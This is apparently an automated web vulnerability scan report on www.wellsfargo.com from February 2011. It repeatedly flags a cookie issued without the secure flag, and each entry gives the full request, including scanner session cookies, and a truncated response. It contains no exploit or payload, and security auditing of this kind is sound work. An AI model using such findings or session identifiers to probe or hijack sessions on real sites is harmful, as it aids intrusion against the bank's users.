The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2633259786.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy_security/fraud/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:29 GMT Content-length: 7546 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=yVv2NJhJb35jxN6JYsp0LJR40jSkyXq8BL1vVYQycy3X5yBqpGnH!-1164025042; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2633259786.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2264161034.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy_security/fraud/report/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:27 GMT Content-length: 6368 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=vJxpNJhHLn21ThPNMCWcdb7TJvhkn1h6BwPSlv9wX4vqvRzqm8Cv!312685559; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2264161034.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Privacy and Securi ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2448710410.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy_security/fraud/report/fraud HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:29 GMT Content-length: 5794 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=sGGJNJhJvdHFzNC5MkDQXh52s09R1dnm7LNy8v1BGT8qQTbWpMvl!-213655893; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2448710410.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Privacy and Securi ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=1811176202.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy_security/online/guarantee HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:31 GMT Content-length: 7173 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=ZWxLNJhLlFLsVdPS3Q2mcXf3Hh6RcqmGMcp1f68BhHGpyYSdLNJr!-180776916; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1811176202.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Privacy and Securi ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2616482570.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products_services/HE_selector HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:58 GMT Location: https://www.wellsfargo.com/customerApp/jsp/products_services/HE_selector.jsp Set-Cookie: wcmcookiewf=Z24pNJhG811khdlryT1wFK10GQBcQnR52yn1FwnyvQyZpkwyblxT!-1966973819; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2616482570.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/custome ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2348047114.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products_services/applications_viewall HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:59 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=pG7tNJhHLB1vQvYZNyr4dHYbT2y4l2WdqgQNVV7HxGrQqxWLchvv!-1657447489; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2348047114.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo - Apply for an Acc ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2197052170.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products_services/brokerage_cklist HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:59 GMT Location: https://www.wellsfargo.com/product/apply?prodCode=WFOR-WFOR&prodSet=APP2K&language=en Set-Cookie: wcmcookiewf=yW8lNJhH2y8PV61Vj0z4DvN2vJJwb2SCmNCn6YJG9hGG1PyGcg9H!1975738457; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2197052170.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/product ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=1760844554.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products_services/deposit_cklist HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:55 GMT Location: https://www.wellsfargo.com/customerApp/app2k/PreApplyRedirect.app?productserv_cd=%2FcustomerApp%2Fjsp%2Fproducts_services%2Fdeposit_cklist Set-Cookie: wcmcookiewf=R0LSNJhDJLQdQfLnqzJygyr0Tchx3G1YHp4RQW2wNh1xkR9TB3RL!-1136720127; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/custome ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2482264842.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products_services/pll_select HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:56 GMT Location: https://www.wellsfargo.com/customerApp/app2k/PreApplyRedirect.app?productserv_cd=%2FcustomerApp%2Fjsp%2Fproducts_services%2Fpll_select Set-Cookie: wcmcookiewf=ngV4NJhGD36GJv77QsGf18L1ZRq9tdksDFVdmDHvNN0R831F9g1h!-1957896322; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2482264842.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/custome ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2650037002.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rates/rates_viewall HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:59 GMT Content-length: 4031 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=DlmtNJhHwTpCxFhl7FBT67mHHMKLxbDC2y70fqHsr9QSGL2dNp8S!-569549476; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2650037002.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2415155978.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings_cds/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:36 GMT Content-length: 10180 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=9yssNJhQcHYRQwphr7KvYjH4Szhz7CLfb0yjsLmN4nqrqJT2KflR!-1077237731; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2415155978.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2096388874.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings_cds/apply HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:37 GMT Content-length: 11173 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=QXvBNJhRBz1LhBrHvvFfBbPQG6rFyxf2hyty12cJL1qHvL1yCGRS!1697366244; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2096388874.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Open a Savings Account or CD</ ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2331269898.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings_cds/cds HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:37 GMT Content-length: 11464 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=3TjSNJhR0CvRKG9J9LJwhrzLL0G7hxT2GGYTmjjJN1n923x9J3gv!-1672152970; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2331269898.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>CD Account - Find the Best CD ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2549373706.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /search/search HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:30:02 GMT Content-type: text/html; charset=utf-8 Cache-Control: no-cache="Set-Cookie" Set-Cookie: wcmcookiesrh=1TB6NJhKK2Z9GypBRB8QHHz19dkkKbNngWBYv9m0hsNTRY1JpPYr!191917939; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2549373706.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2331269898.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sitemap HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:30:01 GMT Content-length: 11525 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=BTp2NJhLsKNhHMTBQmCnJr9FVstXChTLdy3nnj71Z2LlVfPHnRfH!-1672152970; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2331269898.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Sitemap</title> <meta name=" ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2230606602.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /student/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:44 GMT Content-length: 11102 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=6TvRNJhY125zTwF4f6Qfyy7MFhjnl1ynTFX1D79WTJGDGWP1JHHW!1758734416; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2230606602.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2180274954.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /student/loans/apply HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:45 GMT Location: https://www.wellsfargo.com/student/apply Set-Cookie: wcmcookiewf=Pvs8NJhZRksHLhJMnlf8LRvg31mfhM3JhG2tbcvt12x61nL1LDcq!854257767; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2180274954.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/student ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2499042058.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /theprivatebank/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:52 GMT Content-length: 10631 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=STpMNJhQDybSSxHpfhJTFJbY0kNSfpnGW0Fr1nv1mPTTvFqV112n!805790998; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2499042058.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2582928138.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wachovia HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:16 GMT Content-length: 9975 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=3SppNJhcnv0hcQFv6dfXLt0v608QpNnhXmnDLfJKH2M4Rnc1Bvrg!349572437; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2381601546.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wachovia/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:16 GMT Content-length: 9975 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=PTvJNJhcrLjppxSd5CbQ8FhVRPVSLn2Kfk1RZTbVT3krLTx1rHxF!-1341910901; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2381601546.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2062834442.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wachovia/autoloans/index HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:12 GMT Content-length: 4590 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=xppZNJhY7LvrJcpTHmP3cLJpZ1LLPmJkQcPqxfFd8Jckb76K9Gqk!457746116; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2062834442.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2666814218.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wachovia/insurance HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:13 GMT Content-length: 5083 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=HytTNJhZ4qF17hkd05bFxvjm5pjLJZ9SDp232hnZzlBSfDqphjTm!524336973; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2666814218.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
